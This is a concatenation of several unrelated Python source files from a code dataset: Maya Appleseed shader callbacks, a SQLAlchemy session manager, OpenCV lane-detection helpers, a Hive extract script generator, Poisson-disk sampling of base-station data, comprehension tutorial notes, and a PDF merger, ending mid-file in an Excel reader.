createRenderNode(nodeType=None, postCommand=None):\n nodeClass = None\n for cl in pm.getClassification(nodeType):\n if \"appleseed/surface\" in cl.lower():\n nodeClass = \"shader\"\n if \"appleseed/texture\" in cl.lower():\n nodeClass = \"texture\"\n\n if nodeClass == \"shader\":\n mat = pm.shadingNode(nodeType, asShader=True)\n shadingGroup = pm.sets(renderable=True, noSurfaceShader=True, empty=True, name=\"{0}SG\".format(mat))\n mat.outColor >> shadingGroup.surfaceShader\n else:\n mat = pm.shadingNode(nodeType, asTexture=True)\n\n if postCommand is not None:\n postCommand = postCommand.replace(\"%node\", str(mat))\n postCommand = postCommand.replace(\"%type\", '\\\"\\\"')\n pm.mel.eval(postCommand)\n return \"\"\n\ndef createRenderNodeCallback(postCommand, nodeType):\n #logger.debug(\"createRenderNodeCallback called!\")\n\n for c in pm.getClassification(nodeType):\n if 'appleseed' in c.lower():\n buildNodeCmd = \"import appleseedMaya.hyperShadeCallbacks; appleseedMaya.hyperShadeCallbacks.createRenderNode(nodeType=\\\\\\\"{0}\\\\\\\", postCommand='{1}')\".format(nodeType, postCommand)\n buildNodeCmd = \"string $cmd = \\\"{0}\\\"; python($cmd);\".format(buildNodeCmd)\n return buildNodeCmd\n\ndef connectNodeToNodeOverrideCallback(srcNode, destNode):\n return 1\n","sub_path":"scripts/appleseedMaya/hyperShadeCallbacks.py","file_name":"hyperShadeCallbacks.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"575646548","text":"# 데이터 베이스 관리자 설정파일\n# 건드리지 말 것\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n\nclass DBManager():\n __engine = None\n __session = None\n\n @staticmethod\n def init(db_url, db_log_flag=None):\n DBManager.__engine = create_engine(db_url, echo=db_log_flag)\n DBManager.__session = scoped_session(sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=DBManager.__engine\n ))\n dao = DBManager.__session\n\n return dao\n \n @staticmethod\n def init_db():\n from lib.contact_db.member import Base\n Base.metadata.create_all(bind=DBManager.__engine)\n\n","sub_path":"onad_db.py","file_name":"onad_db.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274217294","text":"import cv2\nimport math\nimport numpy as np\n\ndef grayscale(img):\n \"\"\"Applies the Grayscale transform\n This will return an image with only one color channel\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Or use BGR2GRAY if you read an image with cv2.imread()\n # return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \ndef canny(img, low_threshold, high_threshold):\n \"\"\"Applies the Canny transform\"\"\"\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n \"\"\"Applies a Gaussian Noise kernel\"\"\"\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n \n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img) \n \n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n #filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=15):\n \"\"\"\n This function draws `lines` with `color` and `thickness`. \n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n def remove_outliers(x, outlierConstant):\n a = np.array(x)\n upper_quartile = np.percentile(a, 75)\n lower_quartile = np.percentile(a, 25)\n IQR = (upper_quartile - lower_quartile) * outlierConstant\n quartileSet = (lower_quartile - IQR, upper_quartile + IQR)\n resultList = []\n for y in a.tolist():\n if y > quartileSet[0] and y < quartileSet[1]:\n resultList.append(y)\n return resultList\n\n # Average the positions of lines in format: x1, y1, x2, y2\n def get_mean_coordinates(lines):\n x1s, x2s, y1s, y2s = list(), list(), list(), list()\n slopes = list()\n for line in lines:\n for x1, y1, x2, y2 in line:\n x1s.append(x1)\n x2s.append(x2)\n y1s.append(y1)\n y2s.append(y2)\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n slopes.append(slope)\n upper_quartile = np.percentile(slopes, 75)\n lower_quartile = np.percentile(slopes, 25)\n IQR = (upper_quartile - lower_quartile) * 1.5\n bounds = (lower_quartile - IQR, upper_quartile + IQR)\n remove_index_list = []\n for i, s in enumerate(slopes):\n if s < bounds[0] or s > bounds[1]:\n remove_index_list.append(i)\n x1s = [x for i, x in enumerate(x1s) if i not in remove_index_list]\n y1s = [x for i, x in enumerate(y1s) if i not in remove_index_list]\n x2s = [x for i, x in enumerate(x2s) if i not in remove_index_list]\n y2s = [x for i, x in enumerate(y2s) if i not in remove_index_list]\n return np.mean(x1s), np.mean(y1s), np.mean(x2s), np.mean(y2s)\n \n def extrapolate(x1, y1, x2, y2, left=True):\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n elif x1 == x2:\n if left:\n return x1, img.shape[0], x2, 320\n else:\n return x1, 320, x2, img.shape[0]\n \n def get_line(x1, y1, x2, y2):\n if x1 > x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n def line(a, getX=True):\n # y - y1 = slope(x - x1)\n if getX:\n return (a - y1 + slope * x1) / slope\n else:\n return slope * (a - x1) + y1\n return line\n \n line = get_line(x1, y1, x2, y2)\n if left:\n x_limit = (0, 450)\n y_limit = (330, img.shape[0])\n x1_new = x_limit[0]\n y1_new = line(x1_new, getX=False)\n if y1_new > y_limit[1]:\n y1_new = y_limit[1]\n x1_new = line(y1_new, getX=True)\n x2_new = x_limit[1]\n y2_new = line(x2_new, getX=False)\n if y2_new < y_limit[0]:\n y2_new = y_limit[0]\n x2_new = line(y2_new, getX=True)\n else:\n x_limit = (490, img.shape[1])\n y_limit = (330, img.shape[0])\n x1_new = x_limit[0]\n y1_new = line(x1_new, getX=False)\n if y1_new < y_limit[0]:\n y1_new = y_limit[0]\n x1_new = line(y1_new, getX=True)\n x2_new = x_limit[1]\n y2_new = line(x2_new, getX=False)\n if y2_new > y_limit[1]:\n y2_new = y_limit[1]\n x2_new = line(y2_new, getX=True)\n return int(x1_new), int(y1_new), int(x2_new), int(y2_new)\n \n \n # Separate lines to left and right\n left_lines = list()\n right_lines = list()\n for line in lines:\n x1, y1, x2, y2 = line[0]\n if x1 >= x2:\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n slope = (y2 - y1) / (x2 - x1)\n if slope <= 0:\n left_lines.append(line)\n else:\n right_lines.append(line)\n \n if len(left_lines) >= 1:\n x1_left, y1_left, x2_left, y2_left = get_mean_coordinates(left_lines)\n x1_left, y1_left, x2_left, y2_left = extrapolate(x1_left, y1_left, x2_left, y2_left, left=True)\n cv2.line(img, (x1_left, y1_left), (x2_left, y2_left), color, thickness)\n \n if len(right_lines) >= 1:\n x1_right, y1_right, x2_right, y2_right = get_mean_coordinates(right_lines)\n x1_right, y1_right, x2_right, y2_right = extrapolate(x1_right, y1_right, x2_right, y2_right, left=False)\n cv2.line(img, (x1_right, y1_right), (x2_right, y2_right), color, thickness)\n\n \n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n \"\"\"\n `img` should be the output of a Canny transform.\n \n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\n\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + λ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, λ)\n\n","sub_path":"p1-finding-land-line/code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"441997571","text":"#!/usr/bin/python\nfrom os.path import expanduser\nfrom platform import system\nfrom datetime import datetime\nimport optparse\nimport utilities\n\n\ndef main():\n parser = optparse.OptionParser(usage=\"usage: %prog [options values]\",\n version=\"%prog 1.0\")\n\n parser.add_option('-l', '--lkpfile',\n help='input tab delimited Col Meta Data File, including path'\n 'Structure: Source DB, Table, Cols, Col_to_Extract, Extract_Col_DataType',\n dest='lkp_file')\n parser.add_option('-d', '--dbname',\n help='Database of Table to be fork lifted into Hive',\n dest='db_name')\n parser.add_option('-t', '--table',\n help='Table name to be fork lifted into Hive',\n dest='table_name')\n parser.add_option('-a', '--attrib_file',\n help='input tab delimited Table Meta Data File, including path'\n 'Structure: Source DB, Table, Refresh rate, CDC Column, Filter Condition,'\n 'Partition Clause, Bucketing Clause, Staging_DB in Hive, Target_DB in Hive',\n dest='tbl_attrib_file')\n parser.add_option('-w', '--write',\n help='Optional: directory Path where the scripts will be generated',\n dest='tgtdir',\n default='~/tmp')\n parser.add_option('-f', '--filedate',\n help='Optional: Date used in name of extract file',\n dest='fdate',\n default=datetime.now().strftime(\"%Y%m%d\"))\n\n (opts, args) = parser.parse_args()\n\n if opts.lkp_file is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Column Meta Data File with Path\")\n if opts.tbl_attrib_file is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Table Meta Data File with Path\")\n if opts.db_name is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Source Database Name\")\n if opts.table_name is None:\n parser.print_help()\n utilities.abort_with_msg(\"Please provide Source Table/View Name\")\n\n current_os = system()\n if current_os != \"Windows\":\n dir_sep = \"/\"\n #utilities.check_if_running('extract2Hive')\n else:\n dir_sep = \"\\\\\"\n\n utilities.print_info(\"Current OS: \" + current_os)\n utilities.print_info(\"Date used for Filenames: \" + opts.fdate)\n\n db_nm = opts.db_name.strip().upper()\n tbl_nm = opts.table_name.strip().upper()\n\n base_dir = opts.tgtdir if opts.tgtdir[-1] == dir_sep else opts.tgtdir + dir_sep\n log_dir = expanduser('~') + dir_sep + \"log\" + dir_sep\n\n # Fetch Table attributes for Filtering, Partition & Distribution\n tbl_meta = utilities.read_file(arg_db_nm=db_nm, arg_tbl_nm=tbl_nm,\n arg_input_file=opts.tbl_attrib_file, arg_content_type='TABLES')\n\n col_meta = utilities.read_file(arg_db_nm=db_nm, arg_tbl_nm=tbl_nm,\n arg_input_file=opts.lkp_file, arg_content_type='COLS')\n\n script_dict = utilities.gen_script_from_tmplt(arg_base_dir=base_dir, arg_tbl_meta=tbl_meta,\n arg_col_meta=col_meta, arg_dir_sep=dir_sep)\n\n if len(script_dict) == 0:\n utilities.abort_with_msg(\"No Templates Generated\")\n\n utilities.run_extract(arg_tbl_meta=tbl_meta,\n arg_script=script_dict[\"extract\"],\n arg_log_dir=log_dir,\n arg_passwd_file=base_dir + 'common/ENV.scriptpwd.properties',\n arg_date_for_extract=opts.fdate)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"genscr.py","file_name":"genscr.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"304911115","text":"#encoding= utf-8\r\nimport random\r\nimport math\r\nimport pygame # draw point\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport copy\r\n\r\n#station_data format\r\n#pos_x pos_y nor_x nor_y isSampled coverage ebt com_label\r\n#samples format\r\n#nor_x nor_y [coverage ebt com_label index_in_all ]\r\n#samples_index format\r\n#[index1. index2. ... ]\r\n\r\ndef readData(w2v_file):\r\n station_data = [];\r\n fo1 = open(w2v_file,'r',encoding=\"utf-8\"); \r\n for line in fo1.readlines():\r\n term = line.strip().split(' ');\r\n station_data.append([float(term[0]),float(term[1])]);\r\n v1 = [x[0] for x in station_data];v2 = [x[1] for x in station_data]; \r\n max1 = max(v1);min1 = min(v1);max2 = max(v2);min2 = min(v2);\r\n nor1 = max1 - min1;nor2 = max2 - min2;\r\n index = 0;\r\n for item in station_data:\r\n x = item[0]; y = item[1];\r\n station_data[index].append((x-min1)/nor1);\r\n station_data[index].append((y-min2)/nor2);\r\n station_data[index].append(0);\r\n index +=1;\r\n return station_data;\r\n \r\ndef distance(p1, p2):\r\n p_diff = (p2[0] - p1[0], p2[1] - p1[1]);\r\n return math.sqrt(math.pow(p_diff[0], 2) + math.pow(p_diff[1], 2));\r\n \r\ndef is_in_circle(p):\r\n #d = distance(p, (0, 0));\r\n if(p[0]<1 and p[0]> 0 and p[1]< 1 and p[1]>0):\r\n return True;\r\n else:\r\n return False;\r\n\r\ndef generate_random_point(o, r,dataset):\r\n # Generate random point form dataset\r\n i = int(random.random()*len(dataset));\r\n ix = dataset[i][2];\r\n iy = dataset[i][3]; \r\n return [ix, iy];\r\n\r\ndef kde_fun(data):\r\n data1 = []; \r\n for item in data:\r\n data1.append([item[2],item[3]]);\r\n data1 = np.array(data1);\r\n values = data1.T; \r\n kde = stats.gaussian_kde(values);\r\n return kde;\r\n\r\ndef generate_points(kde_function,dataset,oriset,radius):\r\n samples = [];\r\n samples_index = [];\r\n active_list = []; \r\n# for i in range(0,4500):\r\n# samples.append([dataset[i][2],dataset[i][3]]);\r\n len_s = len(dataset);\r\n # Choose a point randomly in the domain.\r\n i = int(random.random()*len_s);\r\n ix = dataset[i][2];\r\n iy = dataset[i][3]; \r\n initial_point = [ix, iy];\r\n samples.append(initial_point);\r\n del(dataset[i]);\r\n # remove the adj of initial point\r\n minimum_dist = float(kde_function(np.array(initial_point)));\r\n minimum_dist = radius * 1/(minimum_dist * 1000)\r\n index = 0;\r\n points = [];\r\n while (index < len(dataset)):\r\n ix = dataset[index][2];\r\n iy = dataset[index][3];\r\n if(distance(initial_point, [ix,iy])< minimum_dist):\r\n points.append([ix,iy]); \r\n del(dataset[index]);\r\n index+=1;\r\n samples_index.append(points);\r\n \r\n active_list.append(initial_point); \r\n while len(active_list) > 0:\r\n # Choose a random point from the active list.\r\n p_index = random.randint(0, len(active_list) - 1);\r\n random_p = active_list[p_index];\r\n \r\n found = False; \r\n # Generate up to k points chosen uniformly at random from dataset\r\n k = 30\r\n for it in range(k):\r\n minimum_dist = float(kde_function(np.array(random_p)));\r\n minimum_dist = radius * 1/(minimum_dist * 1000)\r\n pn = generate_random_point(random_p, minimum_dist,dataset); \r\n fits = True;\r\n # TODO: Optimize. Maintain a grid of existing samples, and only check viable nearest neighbors.\r\n for point in samples:\r\n if distance(point, pn) < minimum_dist:\r\n fits = False;\r\n break \r\n if fits:\r\n samples.append(pn);\r\n active_list.append(pn);\r\n index = 0;\r\n points = [];\r\n while (index < len(dataset)):\r\n ix = dataset[index][2];\r\n iy = dataset[index][3];\r\n if(distance(pn, [ix,iy])< minimum_dist):\r\n points.append([ix,iy]);\r\n del(dataset[index]); \r\n index+=1;\r\n samples_index.append(points);\r\n found = True;\r\n print(str(len(samples)) + \" :\" + str(len(dataset)) + \"-\" + str(minimum_dist));\r\n break;\r\n \r\n if not found:\r\n active_list.remove(random_p);\r\n print(len(active_list));\r\n # Print the samples in a form that can be copy-pasted into other code.\r\n #print(\"There are %d samples:\" % len(samples))\r\n #for point in samples:\r\n # print(\"\\t{%08f,\\t%08f},\" % (point[0], point[1])) \r\n \r\n return samples,samples_index;\r\n\r\ndef add_coverage_attr(station_data,coverage_file):\r\n fr = open(coverage_file,'r',encoding='utf-8');\r\n index = 0;\r\n for line in fr.readlines():\r\n station_data[index].append(float(line));\r\n index += 1;\r\n \r\ndef add_ebt_attr(station_data,ebt_file):\r\n fr = open(ebt_file,'r',encoding='utf-8');\r\n index = 0;\r\n for line in fr.readlines():\r\n station_data[index].append(float(line));\r\n index += 1;\r\n\r\ndef add_com_attr(station_data,name_file,id2label_file):\r\n fr1 = open(name_file,'r',encoding='utf-8');\r\n fr3 = open(id2label_file,'r',encoding='utf-8');\r\n dict_id2label ={};\r\n index = 0;\r\n for line in fr3.readlines():\r\n term = line.strip().split(',');\r\n index += 1;\r\n if (index > 1):\r\n dict_id2label[term[0]] = term[1];\r\n \r\n index = 0;\r\n for line in fr1.readlines():\r\n term = line.strip().split('-') \r\n labelA = dict_id2label[ term[0] ]; \r\n labelB = dict_id2label[ term[1] ]; \r\n if(labelA == labelB):\r\n station_data[index].append(labelA+'-'+labelB);\r\n else:\r\n station_data[index].append(labelA+'-'+labelB);\r\n index += 1;\r\n\r\ndef remove_coverage(samplers,samplers_index,all_data): \r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n maxC = -1; index_j = 0; temp_c = samplers[i][2][0]; \r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j]; \r\n c = tbd[2][0];\r\n if(temp_c > c and maxC < temp_c - c): \r\n maxC = temp_c - c;\r\n index_j =j; \r\n if(index_j == 0):\r\n continue;\r\n print(samplers_index[i][index_j]);\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp; \r\n \r\ndef increase_ebt(samplers,samplers_index,all_data):\r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n minE = -1; index_j = 0; temp_e = samplers[i][2][1]; \r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j]; \r\n e = tbd[2][1];\r\n if(temp_e < e and minE < e - temp_e): \r\n minE = e - temp_e;\r\n index_j =j; \r\n if(index_j == 0):\r\n continue;\r\n print(samplers_index[i][index_j]);\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n \r\ndef calcDistribution(samplers,all_data):\r\n interConnect = [];\r\n for item in all_data:\r\n if(type(item) != list):\r\n continue;\r\n if(item[7] != '0'):\r\n interConnect.append(item[7]);\r\n interConnect1 = [];\r\n for item in samplers:\r\n if(type(item) != list):\r\n continue;\r\n if(item[2][2] != '0'):\r\n interConnect1.append(item[2][2]);\r\n l1 = interConnect;\r\n l2 = [];\r\n [l2.append(i) for i in l1 if not i in l2];\r\n com_list= [];\r\n ori_dis = []; \r\n sam_dis = []; \r\n dict_con2index = {};\r\n index = 0;\r\n for item in l2:\r\n dict_con2index[item] = index;\r\n com_list.append(item);\r\n ori_dis.append(0);\r\n sam_dis.append(0);\r\n index += 1; \r\n for item in interConnect:\r\n index = dict_con2index[item];\r\n ori_dis[index] += 1;\r\n for item in interConnect1:\r\n index = dict_con2index[item];\r\n sam_dis[index] += 1;\r\n \r\n ori_pre = [];\r\n sam_pre = [];\r\n ori_sum = sum(ori_dis);\r\n sam_sum = sum(sam_dis);\r\n for item in ori_dis:\r\n ori_pre.append(item/ori_sum);\r\n for item in sam_dis:\r\n sam_pre.append(item/sam_sum);\r\n adjust = [];\r\n for i,j in zip(ori_pre,sam_pre):\r\n ad = int((i-j)*sam_sum);\r\n adjust.append(ad);\r\n dict_adjust = {};\r\n for i,j in zip(com_list,adjust):\r\n dict_adjust[i] = j;\r\n return dict_adjust;\r\n \r\ndef abjustInterConnectInCommunity(samplers,samplers_index,all_data,dict_adjustC):\r\n len_samplers = len(samplers);\r\n for i in range(0,len_samplers):\r\n temp_adjustC = samplers[i][2][2];\r\n if(temp_adjustC not in dict_adjustC):\r\n continue;\r\n temp_C = dict_adjustC[temp_adjustC];\r\n adjustC = '';\r\n C = 0;\r\n index_j = 0;\r\n if(temp_C == 0):\r\n continue; \r\n elif(temp_C > 0):\r\n min = 100;\r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j];\r\n ajustC = tbd[2][2];\r\n if(ajustC not in dict_adjustC):\r\n continue;\r\n C = dict_adjustC[ajustC];\r\n if(C < 0 and min > C):\r\n min = C;\r\n index_j =j; \r\n \r\n if(index_j == 0):\r\n continue;\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n dict_adjustC.update(temp_adjustC=temp_C-1);\r\n dict_adjustC.update(adjustC=C+1);\r\n else:\r\n max = -100;\r\n len_j = len(samplers_index[i]);\r\n for j in range(0,len_j):\r\n j = j + random.randint(0,int(len_j/10));\r\n if(j >= len_j):\r\n break;\r\n tbd = samplers_index[i][j];\r\n ajustC = tbd[2][2];\r\n if(ajustC not in dict_adjustC):\r\n continue;\r\n C = dict_adjustC[ajustC];\r\n if(C > 0 and max < C):\r\n max = C;\r\n index_j =j; \r\n \r\n if(index_j == 0):\r\n continue;\r\n temp = samplers[i];\r\n samplers[i] = samplers_index[i][index_j];\r\n samplers_index[i][index_j] = temp;\r\n dict_adjustC.update(temp_adjustC=temp_C+1);\r\n dict_adjustC.update(adjustC=C-1);\r\n \r\n# iteator\r\n# object: maintain the constraint community distribution,\r\n# high betweenness,line length distribution,\r\n# manner: set the seq and max Iters to replace the point\r\ndef ite_op(sampling_data,sampling_index,all_data,seq,max_iteration): \r\n iterations = 0;\r\n \r\n while (iterations <= max_iteration):\r\n iterations += 1;\r\n for k in seq:\r\n if (k == 0): \r\n remove_coverage(sampling_data,sampling_index,all_data);\r\n elif(k == 1):\r\n increase_ebt(sampling_data,sampling_index,all_data);\r\n else:\r\n dict_adjust = calcDistribution(sampling_data,all_data);\r\n abjustInterConnectInCommunity(sampling_data,sampling_index,all_data,dict_adjust);\r\n \r\ndef labelData(samples,samples_index,station_data):\r\n index = 0;\r\n for item1 in station_data:\r\n index2 = 0;\r\n for item2 in samples: \r\n if(item1[2] == item2[0] and item1[3] == item2[1]):\r\n station_data[index][4] = 1;\r\n samples[index2].append([item1[5],item1[6],item1[7],index]);\r\n break;\r\n index2 += 1; \r\n index +=1;\r\n\r\n for indexI in range(len(samples_index)):\r\n for indexJ in range(0,len(samples_index[indexI])):\r\n for itemS in station_data:\r\n item = samples_index[indexI][indexJ];\r\n if(item[0] == itemS[2] and item[1] == itemS[3]):\r\n samples_index[indexI][indexJ].append([item1[5],item1[6],item1[7],index]);\r\n break;\r\n\r\ndef generate_data(samples,station_data,w2v_name_file,samples_pos_file,samples_name_file):\r\n fo = open(w2v_name_file,'r',encoding=\"utf-8\");\r\n fw1 = open(samples_pos_file,'w',encoding=\"utf-8\");\r\n fw2 = open(samples_name_file,'w',encoding=\"utf-8\");\r\n output_data =[];\r\n index = 0;\r\n for line in fo.readlines():\r\n station_data[index].append(line);\r\n index +=1;\r\n for item1 in samples:\r\n for item in station_data:\r\n if(item[2] == item1[0] and item[3] == item1[1]):\r\n output_data.append(item);\r\n \r\n print(len(station_data),len(samples),len(output_data))\r\n\r\n for item in output_data:\r\n fw1.write(str(item[0])+ \" \"+str(item[1])+\"\\n\");\r\n fw2.write(item[8]);\r\n fw1.close();\r\n fw2.close();\r\n\r\ndef samples_label(all_labels_file,samples_name_file,samples_label_file):\r\n fo1 = open(all_labels_file,'r',encoding=\"utf-8\");\r\n fo2 = open(samples_name_file,'r',encoding=\"utf-8\");\r\n fw = open(samples_label_file,'w',encoding=\"utf-8\");\r\n \r\n dict_stations = {};\r\n index = 0;\r\n for line in fo1.readlines():\r\n term = line.strip().split(\",\"); \r\n index += 1;\r\n if (index > 1 ):\r\n dict_stations[term[0]] = term[1];\r\n label_list =[];\r\n for line in fo2.readlines():\r\n term = line.strip().split(\"-\");\r\n if(dict_stations[term[0]] == dict_stations[term[1]]):\r\n label = dict_stations[term[0]];\r\n else:\r\n label = \"-1\";\r\n label_list.append(label);\r\n fw.write(label + \"\\n\");\r\n print(\"end!\");\r\n\r\n l1 = label_list;\r\n l2 = [];\r\n [l2.append(i) for i in l1 if not i in l2] \r\n print(len(l2));\r\n print(l2);\r\n\r\ndef display(samples):\r\n pygame.init();\r\n screen = pygame.display.set_mode((500, 500));\r\n clock = pygame.time.Clock();\r\n while True:\r\n break_loop = False;\r\n clock.tick(60); \r\n screen.fill((0,0,0));\r\n pygame.draw.circle(screen, (50, 50, 200), (250, 250), 250, 1); \r\n for point in samples:\r\n lx = 250 + int((point[0]-0.5) * 250);\r\n ly = 250 + int((point[1]-0.5) * 250);\r\n pygame.draw.circle(screen, (255,255,255), (lx, ly), 2);\r\n \r\n pygame.display.flip();\r\n if break_loop:\r\n break\r\n\r\n#---------main program--------\r\n#init data file\r\nw_size = 200; w_fre = 1;\r\nori_file = 'basestation_w2v'+str(w_size)+str(w_fre)+'2D';\r\n\r\nname_file = ori_file+ '_name.txt';\r\npos_file = ori_file+ '.txt';\r\nlabel_file = ori_file+'_label.txt';\r\ncoverage_file= ori_file+'_coverage.txt';\r\nebt_file = ori_file+'_ebt.txt';\r\n\r\nid2com_file = 'lineweight_Com.csv';\r\n\r\npds_r = 25;seq = [0,1,2];max_iteration = 10;\r\n\r\nsam_file = 'pds/basestation_w2v' + str(w_size)+str(w_fre)+'2D_MCpds'+str(pds_r);\r\n\r\nsamples_pos_file = sam_file +'.txt';\r\nsamples_name_file = sam_file +'_name.txt';\r\nsamples_label_file = sam_file +'_label.txt';\r\n\r\n# read points\r\nstation_data = readData(pos_file);\r\n#kde for adptive sampling\r\nkde = kde_fun(station_data);\r\n#sampling\r\ngene_data = copy.deepcopy(station_data);\r\nsamples, samples_index = generate_points(kde,gene_data,station_data,pds_r);\r\n\r\nadd_coverage_attr(station_data,coverage_file);\r\nadd_ebt_attr(station_data,ebt_file);\r\nadd_com_attr(station_data, name_file, id2com_file);\r\nlabelData(samples,samples_index,station_data);\r\n\r\nite_op(samples, samples_index, station_data, seq, max_iteration);\r\n\r\n#write data\r\nprint('number of samplers',len(samples));\r\ngenerate_data(samples,station_data,name_file,samples_pos_file,samples_name_file);\r\nsamples_label(id2com_file,samples_name_file,samples_label_file);\r\nprint(\"end!\");\r\n# display\r\ndisplay(samples);\r\n\r\n","sub_path":"station_pds.py","file_name":"station_pds.py","file_ext":"py","file_size_in_byte":16620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"399546957","text":"#列表推导式\n#集合字典也可\n#元组也可\na = [1,2,3,4,5,6,7,8,9]\nb = [i**3 for i in a if i <=4]\nprint(b)\n\na = (1,2,3,4,5,6,7,8,9)\n# b = [i**3 for i in a if i <=5]\nb = (i**3 for i in a if i <=5)\nprint(b)\n#也可以map filter\nlist_a=[1,2,3,4,5,6,7,8,9]\nr=filter(lambda x:x if x<=5 else 0,list_a)\ns=map(lambda x:x**3,filter(lambda x:x if x<=5 else 0,list_a))\nprint(tuple(r))\nprint(list(s))\n\nstudents ={\n 'wei':18,\n 'lai':19,\n 'wan':20\n}\nb = (key for key,value in students.items())\nprint(b)#['wei', 'lai', 'wan']\nfor x in b:\n print(x)#wei#lai#wan\n\nstudents ={\n 'wei':18,\n 'lai':19,\n 'wan':20\n}\n\nb ={value:key for key,value in students.items()}\nprint(b)\n\n'''\nNone 表示空 不同于\n空字符串 空的列表 0 False\n\n类型不同,值不同\nprint(type(None)) None是None类\n'''\nprint(type(None))\ndef fun():\n return None\n\na = []\nif not a:\n print('S')\nelse:\n print('F')\n\nif a is None:\n print('S')\nelse:\n print('F')\n\nclass Test():\n\n def __len__(self):\n print('len called')\n return True #(只能为int类型)\n\n def __bool__(self):\n print('bool called')\n return False\n\n\nprint(bool(Test()))","sub_path":"simple/a6进阶/None的详解.py","file_name":"None的详解.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"101689624","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport glob\nimport PyPDF2\n\ndef main():\n if len(sys.argv) != 3:\n sys.exit(\"usage : > python multiPDF2onePDF.py [DirectoryName] [OutputName]\")\n pdfout = PyPDF2.PdfFileWriter()\n for path in glob.glob(sys.argv[1] + '/*.pdf'):\n pdfin = PyPDF2.PdfFileReader(open(path, \"rb\"))\n for i in range(0, pdfin.getNumPages()):\n now_page = pdfin.getPage(i)\n pdfout.addPage(now_page)\n outputStream = open(sys.argv[2], \"wb\")\n pdfout.write(outputStream)\n outputStream.close()\n\nif __name__ == '__main__':\n sys.exit(main())\n\n","sub_path":"multiPDF2onePDF.py","file_name":"multiPDF2onePDF.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422607001","text":"import xlrd\nimport json\n\nfrom config import BASE_DIR\n\n\n# def handler_excel(filename=r\"F:\\DHL_h5\\data\\login_data.xls\"): # 文件夹位置\ndef handler_excel(filename=BASE_DIR + \"./data/background_login_data1.xls\"): # 文件夹位置\n # 打开文件\n workbook = xlrd.open_workbook(filename)\n \"\"\"打开文件\"\"\"\n sheet1 = 